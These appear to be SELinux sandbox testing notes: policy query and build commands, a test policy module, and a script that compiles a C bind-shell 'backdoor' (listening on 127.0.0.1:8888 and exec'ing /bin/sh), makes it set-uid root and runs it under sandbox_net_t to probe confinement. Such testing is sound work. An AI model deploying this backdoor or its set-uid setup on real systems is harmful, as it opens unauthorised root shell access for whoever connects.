selinux test policy

List policy

sesearch --allow -C --target=cifs_t --class=file --perm=create
sesearch --allow -C --target=cifs_t --class=dir --perm=remove_name

Compile

make -f /usr/share/selinux/devel/Makefile privadmin.pp
semodule -i privadmin.pp
ausearch -m avc -ts recent

log dontaudit policy

semodule --disable_dontaudit --build
semodule --build

Install

yum install selinux-policy-devel setools-console policycoreutils-python policycoreutils-newrole
yum install policycoreutils-sandbox selinux-policy-sandbox
yum install selinux-policy-mls

Config

ls -Z $(tty)
vim /etc/selinux/mls/contexts/securetty_types
vim /etc/selinux/mls/setrans.conf

Services

systemctl enable mcstransd
# vi /etc/selinux/targeted/setrans.conf
# systemctl disable abrtd

Run sandbox

sandbox -M -H "./sandbox/" -T "/tmp/" -t sandbox_net_t "./test"
/*
source: http://www.binarytides.com/server-client-example-c-sockets-linux/
C socket selinux test code
mkdir ./demo
gcc -o ./demo/backdoor backdoor.c
sudo chown root:root ./demo/backdoor
sudo chmod 6755 ./demo/backdoor
sandbox -M -H "./demo" -T "./demo" -t sandbox_net_t "./demo/backdoor"
*/
#include<stdio.h>
#include<string.h> //strlen
#include<sys/socket.h>
#include<arpa/inet.h> //inet_addr
#include<unistd.h> //write
/*
 * SELinux sandbox test program (see the header comment above): binds a TCP
 * listener on 127.0.0.1:8888, accepts one client, swaps the real and
 * effective UIDs, attaches the client socket to stdin/stdout/stderr and
 * execs /bin/sh. argc/argv are not used. Returns 1 when bind() or accept()
 * fails; otherwise only returns if execv() fails (and then still returns 0).
 */
int main(int argc , char *argv[])
{
// read_size is declared but never used.
int socket_desc , client_sock , c , read_size;
// Neither struct is zero-initialised: only the sin_* members assigned below
// are written, so server.sin_zero is left indeterminate.
struct sockaddr_in server , client;
//Create socket
socket_desc = socket(AF_INET , SOCK_STREAM , 0);
if (socket_desc == -1)
{
// NOTE(review): there is no return here, so execution continues with
// socket_desc == -1; bind() on that invalid descriptor fails and the
// program exits through the "return 1" below. The message has no newline.
printf("Could not create socket");
}
puts("Socket created");
//Prepare the sockaddr_in structure
server.sin_family = AF_INET;
//listen localhost only (the INADDR_ANY variant is kept commented out)
server.sin_addr.s_addr = inet_addr("127.0.0.1");
//server.sin_addr.s_addr = INADDR_ANY;
server.sin_port = htons( 8888 );
//Bind
if( bind(socket_desc,(struct sockaddr *)&server , sizeof(server)) < 0)
{
//print the error message
perror("bind failed. Error");
return 1;
}
puts("bind done");
//Listen with a backlog of 3; the return value is not checked.
listen(socket_desc , 3);
//Accept an incoming connection
puts("Waiting for incoming connections...");
// accept() expects a socklen_t*; c is an int and is cast below. That works
// where int and socklen_t have the same size but is not strictly portable.
c = sizeof(struct sockaddr_in);
//accept connection from an incoming client (blocks until one arrives)
client_sock = accept(socket_desc, (struct sockaddr *)&client, (socklen_t*)&c);
if (client_sock < 0)
{
perror("accept failed");
return 1;
}
puts("Connection accepted");
//setup uid: swap the real and effective UIDs (ruid = geteuid(), euid = getuid()).
//Only the UID is touched despite the original "uid gid" wording; this only
//changes anything when the binary runs set-uid (see the chmod in the header
//comment). The return value is not checked.
setreuid(geteuid(), getuid());
//backdoor code: make stdin/stdout/stderr refer to the client socket, then
//close the original descriptor (the three dup'd copies stay open).
dup2(client_sock, 0);
dup2(client_sock, 1);
dup2(client_sock, 2);
close(client_sock);
// message printed to the network session (stdout is the socket after dup2)
puts("Exec shell backdoor");
// execv() only returns on failure. Passing 0 as argv is non-portable: POSIX
// expects a NULL-terminated array with at least argv[0]. "/bin//sh" resolves
// to /bin/sh. b is never read, and a failed exec still falls through to
// "return 0", so the exit status does not reflect the failure.
int b=execv("/bin//sh", 0);
return 0;
}
# privadmin: test policy module that declares a privadmin_t label for files,
# directories and filesystems and grants access to it (build/install commands
# are in the accompanying notes).
policy_module(privadmin, 1.7)
# Types defined by the base policy that the rules below refer to.
gen_require(`
type sysadm_t;
type unconfined_t;
type mount_t;
')
# New type used as an object label. No process/domain attributes and no
# transitions into privadmin_t are declared on this page.
type privadmin_t;
fs_associate(privadmin_t)
# sysadm_t and unconfined_t may relabel dirs and files *to* privadmin_t; the
# matching relabelfrom on the old label is not granted here.
allow sysadm_t privadmin_t:{ dir file } relabelto;
allow unconfined_t privadmin_t:{ dir file } relabelto;
# mount_t gets the full filesystem-class permission set on privadmin_t-labelled
# filesystems, including relabelfrom/relabelto and quota operations.
allow mount_t privadmin_t:filesystem { mount remount unmount getattr relabelfrom relabelto transition associate quotamod quotaget };
# NOTE(review): privadmin_t is the subject (source) here. With no domain
# declaration for privadmin_t visible on this page, this rule presumably never
# matches a running process — confirm whether it is intended.
allow privadmin_t privadmin_t:filesystem { mount remount unmount getattr relabelfrom relabelto transition associate quotamod quotaget };
# Broad dir/file access for unconfined_t on privadmin_t objects. The file set
# contains neither execute nor execute_no_trans, so privadmin_t-labelled files
# are not made executable by this rule; whether that is intended is not stated.
allow unconfined_t privadmin_t:dir { ioctl read write create getattr setattr lock unlink link rename add_name remove_name reparent search rmdir open };
allow unconfined_t privadmin_t:file { ioctl read write create getattr setattr lock append unlink link rename open } ;
#!/bin/bash
# Build the SELinux sandbox test binary (backdoor.c) as a set-uid root file and
# run it in the sandbox_net_t domain. Run from the directory holding backdoor.c;
# sudo is required for the compile, chown, chmod and chcon steps.
# -e: stop on first failing command, -u: unset variables are errors,
# -x: echo each command, -o pipefail: a failing pipe stage fails the pipeline.
set -euxo pipefail
BACKDOOR="./backdoor"
# Only used by the commented-out sandbox invocation at the bottom (-T ./sandbox/tmp).
mkdir -p ./sandbox/tmp
# Compiling under sudo presumably already yields a root-owned output file,
# which would make the chown on the next line redundant (harmless either way).
sudo gcc -o $BACKDOOR backdoor.c
# NOTE(review): literal ./backdoor here while every other line uses $BACKDOOR;
# both name the same path.
sudo chown root:root ./backdoor
# 4755 = set-uid bit plus rwxr-xr-x; the header comment of backdoor.c uses 6755
# (set-gid as well). The C code's setreuid() call relies on this bit.
sudo chmod 4755 $BACKDOOR
# Label the binary with the sandbox_net_t type, then run it in that domain.
sudo chcon -t sandbox_net_t $BACKDOOR
runcon -t sandbox_net_t $BACKDOOR
# Alternative launch through the sandbox tool, with ./sandbox as HOME and ./sandbox/tmp as /tmp.
#sandbox -M -H "./sandbox" -T "./sandbox/tmp" -t sandbox_net_t "$BACKDOOR"

H0neyBadger commented Nov 17, 2017

To test :

sandbox -M -H "./nomad/" -T "./tmp/" -t sandbox_net_t "./nomad" agent -config config/server.hcl
egrep "^/tmp" /etc/selinux/targeted/contexts/files/file_contexts
